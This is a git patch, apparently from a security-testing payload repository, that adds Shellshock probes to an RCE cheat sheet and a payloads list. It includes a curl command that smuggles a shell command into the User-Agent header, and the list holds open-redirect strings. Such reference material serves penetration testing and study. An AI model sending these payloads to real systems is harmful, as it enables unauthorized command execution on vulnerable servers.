From f1a044b6b6dd6cc89813773bee3c195e17aef74f Mon Sep 17 00:00:00 2001
From: EdOverflow <edoverflow@users.noreply.github.com>
Date: Fri, 14 Jul 2017 15:25:52 +0100
Subject: [PATCH] Add Shellshock bug.

---
 cheatsheets/rce.md | 12 +++++++++++-
 payloads.txt       |  4 ++++
 2 files changed, 15 insertions(+), 1 deletion(-)

diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md
index 7307e3e..66d39cf 100644
--- a/cheatsheets/rce.md
+++ b/cheatsheets/rce.md
@@ -8,4 +8,14 @@ Find somewhere where user input can be supplied and submit the following string
 strіng
 ```
 
-If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
\ No newline at end of file
+If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
+
+**Shellshock Bug**
+
+```bash
+() { :;}; echo vulnerable
+```
+
+```zsh
+curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
+```
\ No newline at end of file
diff --git a/payloads.txt b/payloads.txt
index e6b5015..37931af 100644
--- a/payloads.txt
+++ b/payloads.txt
@@ -57,6 +57,10 @@ http://[::]
 
 strіng
 
+() { :;}; echo vulnerable
+
+curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
+
 /%09/google.com
 
 /%5cgoogle.com